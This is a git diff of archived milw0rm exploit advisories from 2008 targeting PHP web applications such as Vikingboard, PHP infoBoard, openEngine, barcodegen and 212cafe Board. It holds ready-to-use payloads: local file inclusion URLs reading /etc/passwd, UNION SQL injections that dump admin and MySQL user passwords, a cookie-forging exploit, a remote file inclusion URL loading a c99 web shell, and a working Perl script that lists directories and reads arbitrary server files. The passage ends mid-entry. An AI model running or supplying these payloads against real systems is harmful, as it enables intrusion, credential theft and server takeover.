+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ ###################################################################
+ #  [ phpOCS <= 0.1-beta3 ]   Local File Inclusion Vulnerability   #
+ ###################################################################
+ #
+ # Script: "phpOCS is a fully featured Online Community System. It has fully customisable message boards, calendars, galleries and articles."
+ #
+ # Script site: http://phpocs.sourceforge.net/
+ # Download: http://sourceforge.net/projects/phpocs/
+ #
+ # Vuln: 
+ # http://site.com/[phpocs-0.1-beta3]/index.php?act=../../../../../../../etc/passwd%00
+ #     
+ #
+ # Bug: ./phpocs-0.1-beta3/index.php (lines: 7 and 9)
+ #
+ # ...
+ # 7:     include("library/include.inc.php");   	// (1);
+ # 9:     makepage();					// (2);
+ # ... 			    
+ #
+ #
+ # Bug: ./phpocs-0.1-beta3/library/pagefunctions.inc.php (lines: 3-104)
+ #
+ # ...
+ # 3:     function makepage() {
+ # ...    // (lines: 72-79)
+ #   	if (isset($_GET['act']))
+ #		{
+ #		include("library/{$_GET['act']}.php"); 	// (3) LFI
+ #		}
+ #	else
+ #		{
+ #		include("library/home.php");
+ #		}
+ # ...
+ # 104:   }
+ # ... 			    
+ #
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * str0ke * and otherz..
+ ###############################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-09-25]
diff --git a/platforms/php/webapps/6564.txt b/platforms/php/webapps/6564.txt
index a6317c394..37ff9a2f5 100755
--- a/platforms/php/webapps/6564.txt
+++ b/platforms/php/webapps/6564.txt
@@ -1,61 +1,60 @@
-
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- #######################################################################
- #  [ Vikingboard <= 0.2 Beta ]   Local File Inclusion Vulnerability   #
- #######################################################################
- #
- # Script: "Vikingboard is a PHP-based discussion forum..."
- #
- # Script site: http://vikingboard.com/
- # Download: http://sourceforge.net/projects/vboard/
- #
- # Vuln: 
- # http://site.com/[Vikingboard_0.2_Beta]/upload/index.php?act=task&task=./../../../../../../../etc/passwd%00
- #
- #
- # Bug: ./Vikingboard_0.2_Beta/upload/index.php (lines: 81-91)
- #
- # ...
- # 81:		switch(ifsetor($_GET['act'], false))
- # 82:		{
- #		 ...
- # 88:		 case 'task':
- # 89:		 require('./inc/lib/task_loader.php');				// (1)
- # 90:		 load_task();							// (2)	
- # 91:		 break;
- # ... 			    
- #
- #
- # Bug: ./Vikingboard_0.2_Beta/upload/inc/lib/task_loader.php (lines: 19-44)
- #
- # ...
- # 19: 		function load_task()
- # 20: 		{
- #		   ...
- # 27:		   if (!include("inc/tasks/task_{$_GET['task']}.php"))  	// (3) LFI
- # 28:		   {
- # 29:		      //	Stop the script if the task does not exist
- # 30:		      die();
- # 31:		   }
- #		....
- # 44:		}
- # ... 			    
- #
- #
- ###############################################
- # Greetz: D3m0n_DE * str0ke * and otherz..
- ###############################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-09-25]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ #######################################################################
+ #  [ Vikingboard <= 0.2 Beta ]   Local File Inclusion Vulnerability   #
+ #######################################################################
+ #
+ # Script: "Vikingboard is a PHP-based discussion forum..."
+ #
+ # Script site: http://vikingboard.com/
+ # Download: http://sourceforge.net/projects/vboard/
+ #
+ # Vuln: 
+ # http://site.com/[Vikingboard_0.2_Beta]/upload/index.php?act=task&task=./../../../../../../../etc/passwd%00
+ #
+ #
+ # Bug: ./Vikingboard_0.2_Beta/upload/index.php (lines: 81-91)
+ #
+ # ...
+ # 81:		switch(ifsetor($_GET['act'], false))
+ # 82:		{
+ #		 ...
+ # 88:		 case 'task':
+ # 89:		 require('./inc/lib/task_loader.php');				// (1)
+ # 90:		 load_task();							// (2)	
+ # 91:		 break;
+ # ... 			    
+ #
+ #
+ # Bug: ./Vikingboard_0.2_Beta/upload/inc/lib/task_loader.php (lines: 19-44)
+ #
+ # ...
+ # 19: 		function load_task()
+ # 20: 		{
+ #		   ...
+ # 27:		   if (!include("inc/tasks/task_{$_GET['task']}.php"))  	// (3) LFI
+ # 28:		   {
+ # 29:		      //	Stop the script if the task does not exist
+ # 30:		      die();
+ # 31:		   }
+ #		....
+ # 44:		}
+ # ... 			    
+ #
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * str0ke * and otherz..
+ ###############################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-09-25]
diff --git a/platforms/php/webapps/6566.txt b/platforms/php/webapps/6566.txt
index 3ccdd600c..08807d93a 100755
--- a/platforms/php/webapps/6566.txt
+++ b/platforms/php/webapps/6566.txt
@@ -1,57 +1,57 @@
-==========================================================
-  PHP infoBoard V.7 Plus Multiple Remote Vulnerabilities
-==========================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-AUTHOR : CWH Underground
-DATE   : 25 September 2008
-SITE   : cwh.citec.us
-
-
-#####################################################
-APPLICATION : PHP infoBoard V.7 Plus
-VERSION     : v.7
-VENDOR      : http://cannot.info/phpinfoboard
-DOWNLOAD    : http://cannot.info/lib/dw/plus7.zip
-#####################################################
-
--- Remote SQL Injection ---
-
-[+]http://[Target]/[path]/showtopic.php?idcat=-1'/**/UNION/**/SELECT/**/1,2,3,4,concat(info_name,0x3a,0x3a,0x3a,info_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/**/FROM/**/[prefix]info_admin--&showpage=10
-[+]http://[Target]/[path]/showtopic.php?idcat=-1'/**/UNION/**/SELECT/**/1,2,3,4,concat(info_name,0x3a,0x3a,0x3a,info_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/**/FROM/**/[prefix]info_user--&showpage=10
-
-Note: [prefix] is a prefix of table names that an administrator assigns it when he sets up PHP infoBoard.
-
-
--- Strore XSS --
-
-At page http://[Target]/[path]/?action=newtopic&idcat=[number]
-
-This page is used to add new topics and there is a feild "ª×èÍ" which is prepared for inserting poster's name.
-We can inject javascript into this feild as result in "Stored XSS". 
-
-Example code of vulnerable input feild:
-ª×èÍ
-
-Note: 
-- [number] is a idcat  that an administrator assigns it (default is 1).
-- We can inject javascript into the feild when we do not log in to be a user of a PHP infoBoard.
-
-
-#####################################################################
-Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
-Special Thx : asylu3, str0ke, citec.us, milw0rm.com
-#####################################################################
-
-# milw0rm.com [2008-09-25]
+==========================================================
+  PHP infoBoard V.7 Plus Multiple Remote Vulnerabilities
+==========================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+AUTHOR : CWH Underground
+DATE   : 25 September 2008
+SITE   : cwh.citec.us
+
+
+#####################################################
+APPLICATION : PHP infoBoard V.7 Plus
+VERSION     : v.7
+VENDOR      : http://cannot.info/phpinfoboard
+DOWNLOAD    : http://cannot.info/lib/dw/plus7.zip
+#####################################################
+
+-- Remote SQL Injection ---
+
+[+]http://[Target]/[path]/showtopic.php?idcat=-1'/**/UNION/**/SELECT/**/1,2,3,4,concat(info_name,0x3a,0x3a,0x3a,info_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/**/FROM/**/[prefix]info_admin--&showpage=10
+[+]http://[Target]/[path]/showtopic.php?idcat=-1'/**/UNION/**/SELECT/**/1,2,3,4,concat(info_name,0x3a,0x3a,0x3a,info_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/**/FROM/**/[prefix]info_user--&showpage=10
+
+Note: [prefix] is a prefix of table names that an administrator assigns it when he sets up PHP infoBoard.
+
+
+-- Strore XSS --
+
+At page http://[Target]/[path]/?action=newtopic&idcat=[number]
+
+This page is used to add new topics and there is a feild "ª×èÍ" which is prepared for inserting poster's name.
+We can inject javascript into this feild as result in "Stored XSS". 
+
+Example code of vulnerable input feild:
+ª×èÍ
+
+Note: 
+- [number] is a idcat  that an administrator assigns it (default is 1).
+- We can inject javascript into the feild when we do not log in to be a user of a PHP infoBoard.
+
+
+#####################################################################
+Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
+Special Thx : asylu3, str0ke, citec.us, milw0rm.com
+#####################################################################
+
+# milw0rm.com [2008-09-25]
diff --git a/platforms/php/webapps/6567.pl b/platforms/php/webapps/6567.pl
index 7edb122dc..47e44166d 100755
--- a/platforms/php/webapps/6567.pl
+++ b/platforms/php/webapps/6567.pl
@@ -1,95 +1,95 @@
-#! /usr/bin/perl
-
-# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-# Libra PHP File Manager <= 1.18 / Local File Inclusion Vulnerability
-# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-# Program: Libra PHP File Manager
-# Version: <= 1.18 , 2.0
-# File affected: fileadmin.php
-# Download: http://file.sourceforge.net
-#
-#
-# Found by Pepelux 
-# eNYe-Sec - www.enye-sec.org
-# Greetings to Ka0x for help me with the perl code  :)
-#
-# You can scale directories and read any file that you have permissions
-
-use LWP::UserAgent;
-$ua = LWP::UserAgent->new;
-
-print "\e[2J";
-system(($^O eq 'MSWin32') ? 'cls' : 'clear');
-
-my ($host, $path, $action) = @ARGV ;
-
-unless($ARGV[2]) {
-	print "Usage: perl $0   \n";
-	print "\tex: perl $0 http://site.com /etc/ list\n";
-	print "\tex: perl $0 http://site.com /etc/passwd edit\n";
-	print "Actions:\n";
-	print "   list:\n";
-	print "   edit:\n\n";
-	exit 1;
-}
-
-$ua->agent("$0/0.1 " . $ua->agent);
-$host = "http://".$host if ($host !~ /^http:/);
-$path = $path."/" if ($action eq "list" && $path !~ /\/$/);
-$op = "home" if ($action == "list");
-
-if ($action eq "edit") {
-	$aux = $path;
-	$directory = "";
-
-	do {
-		$x = index($aux, "/");
-		$y = length($aux) - $x;
-		$directory .= substr($aux, 0, $x+1);
-		$aux = substr($aux, $x+1, $y);
-	} until ($x == -1);
-
-	$path = $directory;
-	$file = $aux;
-	$op = "edit";
-}
-
-$url = $host."/fileadmin.php?user=root&isadmin=yes&op=".$op."&folder=".$path;
-$url .= "&fename=".$file if ($action eq "edit");
-
-$req = HTTP::Request->new(GET => $url);
-$req->header('Accept' => 'text/html');
-
-$res = $ua->request($req);
-
-if ($res->is_success) { 
-	$result = $res->content;
-
-	if ($action eq "edit") {
-		print "Viewing $path$file:\n";
-		print $1,"\n" if($result =~ /name="ncontent">(.*)<\/textarea>/s);
-	}
-	else {
-		print "Files in $path:\n";
-		$x = index($result, "Files:") + 6;
-		$result = substr($result, $x, length($result)-$x);
-		$result =~ s/<[^>]*>//g;
-		$result =~ s/Filename//g;
-		$result =~ s/Size//g;
-		$result =~ s/Edit//g;
-		$result =~ s/Rename//g;
-		$result =~ s/Delete//g;
-		$result =~ s/Move//g;
-		$result =~ s/View//g;
-		$result =~ s/Open//g;
-		$result =~ s/\d*//g;
-		$result =~ s/\s+/\n/g;
-		$x = index($result, "Copyright");
-		$result = substr($result, 0, $x);
-		print $result;
-	}
-} 
-else { print "Error: " . $res->status_line . "\n";}
-
-# milw0rm.com [2008-09-25]
+#! /usr/bin/perl
+
+# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+# Libra PHP File Manager <= 1.18 / Local File Inclusion Vulnerability
+# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+# Program: Libra PHP File Manager
+# Version: <= 1.18 , 2.0
+# File affected: fileadmin.php
+# Download: http://file.sourceforge.net
+#
+#
+# Found by Pepelux 
+# eNYe-Sec - www.enye-sec.org
+# Greetings to Ka0x for help me with the perl code  :)
+#
+# You can scale directories and read any file that you have permissions
+
+use LWP::UserAgent;
+$ua = LWP::UserAgent->new;
+
+print "\e[2J";
+system(($^O eq 'MSWin32') ? 'cls' : 'clear');
+
+my ($host, $path, $action) = @ARGV ;
+
+unless($ARGV[2]) {
+	print "Usage: perl $0   \n";
+	print "\tex: perl $0 http://site.com /etc/ list\n";
+	print "\tex: perl $0 http://site.com /etc/passwd edit\n";
+	print "Actions:\n";
+	print "   list:\n";
+	print "   edit:\n\n";
+	exit 1;
+}
+
+$ua->agent("$0/0.1 " . $ua->agent);
+$host = "http://".$host if ($host !~ /^http:/);
+$path = $path."/" if ($action eq "list" && $path !~ /\/$/);
+$op = "home" if ($action == "list");
+
+if ($action eq "edit") {
+	$aux = $path;
+	$directory = "";
+
+	do {
+		$x = index($aux, "/");
+		$y = length($aux) - $x;
+		$directory .= substr($aux, 0, $x+1);
+		$aux = substr($aux, $x+1, $y);
+	} until ($x == -1);
+
+	$path = $directory;
+	$file = $aux;
+	$op = "edit";
+}
+
+$url = $host."/fileadmin.php?user=root&isadmin=yes&op=".$op."&folder=".$path;
+$url .= "&fename=".$file if ($action eq "edit");
+
+$req = HTTP::Request->new(GET => $url);
+$req->header('Accept' => 'text/html');
+
+$res = $ua->request($req);
+
+if ($res->is_success) { 
+	$result = $res->content;
+
+	if ($action eq "edit") {
+		print "Viewing $path$file:\n";
+		print $1,"\n" if($result =~ /name="ncontent">(.*)<\/textarea>/s);
+	}
+	else {
+		print "Files in $path:\n";
+		$x = index($result, "Files:") + 6;
+		$result = substr($result, $x, length($result)-$x);
+		$result =~ s/<[^>]*>//g;
+		$result =~ s/Filename//g;
+		$result =~ s/Size//g;
+		$result =~ s/Edit//g;
+		$result =~ s/Rename//g;
+		$result =~ s/Delete//g;
+		$result =~ s/Move//g;
+		$result =~ s/View//g;
+		$result =~ s/Open//g;
+		$result =~ s/\d*//g;
+		$result =~ s/\s+/\n/g;
+		$x = index($result, "Copyright");
+		$result = substr($result, 0, $x);
+		print $result;
+	}
+} 
+else { print "Error: " . $res->status_line . "\n";}
+
+# milw0rm.com [2008-09-25]
diff --git a/platforms/php/webapps/6568.txt b/platforms/php/webapps/6568.txt
index f8510c39b..bb0a4f029 100755
--- a/platforms/php/webapps/6568.txt
+++ b/platforms/php/webapps/6568.txt
@@ -1,11 +1,11 @@
-###############################################################################################
-[+] PHP infoBoard V.7 Plus Insecure Cookie Handling Vulnerability
-[+] Discovered By Stack               
-[+] Greetz : All my freind              
-################################################################################################
----
-exploit:
-
-javascript:document.cookie = "infouser=1; path=/"; document.cookie = "infopass=1; path=/";
-
-# milw0rm.com [2008-09-25]
+###############################################################################################
+[+] PHP infoBoard V.7 Plus Insecure Cookie Handling Vulnerability
+[+] Discovered By Stack               
+[+] Greetz : All my freind              
+################################################################################################
+---
+exploit:
+
+javascript:document.cookie = "infouser=1; path=/"; document.cookie = "infopass=1; path=/";
+
+# milw0rm.com [2008-09-25]
diff --git a/platforms/php/webapps/6569.txt b/platforms/php/webapps/6569.txt
index 15e6b65f4..603ed3d37 100755
--- a/platforms/php/webapps/6569.txt
+++ b/platforms/php/webapps/6569.txt
@@ -1,21 +1,21 @@
----------------------------------------------------------------------
- Vikingboard <= 0.2 Beta SQL Column Truncation
----------------------------------------------------------------------
- Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
- Discovered On: 25/09/2008
----------------------------------------------------------------------
- You Can Register An User\Admin That Already Exists!
----------------------------------------------------------------------
- URL: upload/register.php
- 
- Username: [username]                                            NULL
- Password: [password]
- E-Mail:   [E-Mail]
----------------------------------------------------------------------
- URL: upload/login.php
- 
- Username: [username]
- Password: [password]
----------------------------------------------------------------------
-
-# milw0rm.com [2008-09-25]
+---------------------------------------------------------------------
+ Vikingboard <= 0.2 Beta SQL Column Truncation
+---------------------------------------------------------------------
+ Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
+ Discovered On: 25/09/2008
+---------------------------------------------------------------------
+ You Can Register An User\Admin That Already Exists!
+---------------------------------------------------------------------
+ URL: upload/register.php
+ 
+ Username: [username]                                            NULL
+ Password: [password]
+ E-Mail:   [E-Mail]
+---------------------------------------------------------------------
+ URL: upload/login.php
+ 
+ Username: [username]
+ Password: [password]
+---------------------------------------------------------------------
+
+# milw0rm.com [2008-09-25]
diff --git a/platforms/php/webapps/6571.txt b/platforms/php/webapps/6571.txt
index ef594358d..b62a78ee4 100755
--- a/platforms/php/webapps/6571.txt
+++ b/platforms/php/webapps/6571.txt
@@ -1,38 +1,37 @@
-
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- ########################################################################
- #  [ openEngine <= 2.0 beta4 ]   Remote File Inclusion Vulnerability   #
- ########################################################################
- #
- # Script: "Open Source Web Content Management Systems openEngine"
- #
- # Script site: http://www.openengine.de/
- # Download:  http://sourceforge.net/projects/openengine/
- #
- # Vuln: http://site.com/[openengine20]/cms/system/openengine.php?oe_classpath=[spread???]
- #      
- #
- # Bug: ./openengine20/cms/system/openengine.php
- #
- # ...
- # 	require($oe_classpath."/openengine/database/mysql.php");
- # ... 	 
- #
- #
- ###############################################
- # Greetz: D3m0n_DE * str0ke * and otherz..
- ###############################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-09-25]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ ########################################################################
+ #  [ openEngine <= 2.0 beta4 ]   Remote File Inclusion Vulnerability   #
+ ########################################################################
+ #
+ # Script: "Open Source Web Content Management Systems openEngine"
+ #
+ # Script site: http://www.openengine.de/
+ # Download:  http://sourceforge.net/projects/openengine/
+ #
+ # Vuln: http://site.com/[openengine20]/cms/system/openengine.php?oe_classpath=[spread???]
+ #      
+ #
+ # Bug: ./openengine20/cms/system/openengine.php
+ #
+ # ...
+ # 	require($oe_classpath."/openengine/database/mysql.php");
+ # ... 	 
+ #
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * str0ke * and otherz..
+ ###############################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-09-25]
diff --git a/platforms/php/webapps/6575.txt b/platforms/php/webapps/6575.txt
index 7e05cdcfc..f9f8452b7 100755
--- a/platforms/php/webapps/6575.txt
+++ b/platforms/php/webapps/6575.txt
@@ -1,29 +1,29 @@
-# Name : barcodegen <= 2.0.0 Remote File Inclusion Vulnerability
- 
-# Download From : http://www.barcodephp.com/processdownload.php?id=barcodegen.1d-php4.v2.0.0.zip
- 
-# Found By : Br0k3n H34rT
- 
-# Home Page : WwW.Sec-Code.CoM
- 
-============================================================================
- 
-# Vulne Code : In File : LSTable.php In Line 21 :
- 
-include( $class_dir.'/Table_template.php' );
- 
-# Exploit :
- 
-http://WwW.Sec-Code.CoM/barcodegen.1d-php4.v2.0.0/class/LSTable.php?class_dir=http://SITE.COM/shell/c99.txt?
- 
-============================================================================
- 
-# Greet To :
- 
-My Master RoMaNcYxHaCkEr , And All My Members
- 
-# Note : Eid Mobarak :)
- 
-# bEST wISHES
-
-# milw0rm.com [2008-09-26]
+# Name : barcodegen <= 2.0.0 Remote File Inclusion Vulnerability
+ 
+# Download From : http://www.barcodephp.com/processdownload.php?id=barcodegen.1d-php4.v2.0.0.zip
+ 
+# Found By : Br0k3n H34rT
+ 
+# Home Page : WwW.Sec-Code.CoM
+ 
+============================================================================
+ 
+# Vulne Code : In File : LSTable.php In Line 21 :
+ 
+include( $class_dir.'/Table_template.php' );
+ 
+# Exploit :
+ 
+http://WwW.Sec-Code.CoM/barcodegen.1d-php4.v2.0.0/class/LSTable.php?class_dir=http://SITE.COM/shell/c99.txt?
+ 
+============================================================================
+ 
+# Greet To :
+ 
+My Master RoMaNcYxHaCkEr , And All My Members
+ 
+# Note : Eid Mobarak :)
+ 
+# bEST wISHES
+
+# milw0rm.com [2008-09-26]
diff --git a/platforms/php/webapps/6576.txt b/platforms/php/webapps/6576.txt
index f54736c5f..7f82c3bb6 100755
--- a/platforms/php/webapps/6576.txt
+++ b/platforms/php/webapps/6576.txt
@@ -1,57 +1,57 @@
-================================================================================
-  Ultimate Webboard (webboard.php Category) Remote SQL Injection Vulnerability
-================================================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-AUTHOR : CWH Underground
-DATE   : 26 September 2008
-SITE   : cwh.citec.us
-
-
-#####################################################
-APPLICATION : Ultimate Webboard 
-VERSION     : 3.00
-DOWNLOAD    : http://php.deeserver.net/download/get/79/webboard3.0.0.zip
-#####################################################
-
---- Remote SQL Injection ---
-
-** Magic Quote must turn off **
-
------------------------------------
- Vulnerable File (webboard.php)
------------------------------------
-
-$sql="select * from board_data where Category='$Category' order by No DESC";
-
----------
- Exploit
----------
-
-[+] http://[Target]/[webboard]/webboard.php?Category=[Category'name][SQL Injection]
-
-
-------
- POC
-------
-
-[+] http://[Target]/[webboard]/webboard.php?Category=general'/**/UNION/**/SELECT/**/1,concat(user,0x3a3a,password),3,4,5,6,7,8/**/FROM/**/mysql.user/**/where/**/user='root
-
-
-#####################################################################
-Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
-Special Thx : asylu3, str0ke, citec.us, milw0rm.com
-#####################################################################
-
-# milw0rm.com [2008-09-26]
+================================================================================
+  Ultimate Webboard (webboard.php Category) Remote SQL Injection Vulnerability
+================================================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+AUTHOR : CWH Underground
+DATE   : 26 September 2008
+SITE   : cwh.citec.us
+
+
+#####################################################
+APPLICATION : Ultimate Webboard 
+VERSION     : 3.00
+DOWNLOAD    : http://php.deeserver.net/download/get/79/webboard3.0.0.zip
+#####################################################
+
+--- Remote SQL Injection ---
+
+** Magic Quote must turn off **
+
+-----------------------------------
+ Vulnerable File (webboard.php)
+-----------------------------------
+
+$sql="select * from board_data where Category='$Category' order by No DESC";
+
+---------
+ Exploit
+---------
+
+[+] http://[Target]/[webboard]/webboard.php?Category=[Category'name][SQL Injection]
+
+
+------
+ POC
+------
+
+[+] http://[Target]/[webboard]/webboard.php?Category=general'/**/UNION/**/SELECT/**/1,concat(user,0x3a3a,password),3,4,5,6,7,8/**/FROM/**/mysql.user/**/where/**/user='root
+
+
+#####################################################################
+Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
+Special Thx : asylu3, str0ke, citec.us, milw0rm.com
+#####################################################################
+
+# milw0rm.com [2008-09-26]
diff --git a/platforms/php/webapps/6577.txt b/platforms/php/webapps/6577.txt
index f6b7552ad..b8f16124d 100755
--- a/platforms/php/webapps/6577.txt
+++ b/platforms/php/webapps/6577.txt
@@ -1,60 +1,60 @@
-===================================================================
-  PromoteWeb MySQL (go.php id) Remote SQL Injection Vulnerability
-===================================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-AUTHOR : CWH Underground
-DATE   : 26 September 2008
-SITE   : cwh.citec.us
-
-
-#####################################################
-APPLICATION : PromoteWeb MySQL
-DOWNLOAD    : http://php.deeserver.net/download/get/23/promote.zip
-#####################################################
-
---- Remote SQL Injection ---
-
-** Magic Quote must turn off **
-
------------------------------------
- Vulnerable File (go.php)
------------------------------------
-
-$sql = "select * from promote where No='$id'";
-
----------
- Exploit
----------
-
-[+] http://[Target]/[promote]/go.php?id=[SQL Injection]
-
-
-------
- POC
-------
-
-[+] http://[Target]/[promote]/go.php?id=1'/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7,8/**/FROM/**/promote/**/WHERE/**/No='1
-
-
-Note!! Result of SQL Injection will appear new window with http://[result]/ 
-Example: http://5.0.51a/
-
-
-#####################################################################
-Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
-Special Thx : asylu3, str0ke, citec.us, milw0rm.com
-#####################################################################
-
-# milw0rm.com [2008-09-26]
+===================================================================
+  PromoteWeb MySQL (go.php id) Remote SQL Injection Vulnerability
+===================================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+AUTHOR : CWH Underground
+DATE   : 26 September 2008
+SITE   : cwh.citec.us
+
+
+#####################################################
+APPLICATION : PromoteWeb MySQL
+DOWNLOAD    : http://php.deeserver.net/download/get/23/promote.zip
+#####################################################
+
+--- Remote SQL Injection ---
+
+** Magic Quote must turn off **
+
+-----------------------------------
+ Vulnerable File (go.php)
+-----------------------------------
+
+$sql = "select * from promote where No='$id'";
+
+---------
+ Exploit
+---------
+
+[+] http://[Target]/[promote]/go.php?id=[SQL Injection]
+
+
+------
+ POC
+------
+
+[+] http://[Target]/[promote]/go.php?id=1'/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7,8/**/FROM/**/promote/**/WHERE/**/No='1
+
+
+Note!! Result of SQL Injection will appear new window with http://[result]/ 
+Example: http://5.0.51a/
+
+
+#####################################################################
+Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
+Special Thx : asylu3, str0ke, citec.us, milw0rm.com
+#####################################################################
+
+# milw0rm.com [2008-09-26]
diff --git a/platforms/php/webapps/6578.txt b/platforms/php/webapps/6578.txt
index f4d8c8534..9bf6bee86 100755
--- a/platforms/php/webapps/6578.txt
+++ b/platforms/php/webapps/6578.txt
@@ -1,58 +1,58 @@
-===================================================================
-  212cafe Board (view.php qID) Remote SQL Injection Vulnerability
-===================================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-AUTHOR : CWH Underground
-DATE   : 26 September 2008
-SITE   : cwh.citec.us
-
-
-#####################################################
-APPLICATION : 212cafe Board 
-VERSION     : 0.07
-VENDOR      : http://www.212cafe.com/
-DOWNLOAD    : http://php.deeserver.net/download/get/12/212cafeboard_v0_07.zip
-#####################################################
-
---- Remote SQL Injection ---
-
-** Magic Quote must turn off **
-
------------------------------------
- Vulnerable File (view.php)
------------------------------------
-
-$query="SELECT * FROM board_question WHERE (qID='$qID')";
-
----------
- Exploit
----------
-
-[+] http://[Target]/[212cafeboard]/view.php?qID=[SQL Injection]
-
-
-------
- POC
-------
-
-[+] http://[Target]/[212cafeboard]/view.php?qID=-9999')/**/UNION/**/SELECT/**/1,concat(mUser,0x3a3a,mPasswd),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/FROM/**/board_member/**/WHERE/**/(mID='1
-
-
-#####################################################################
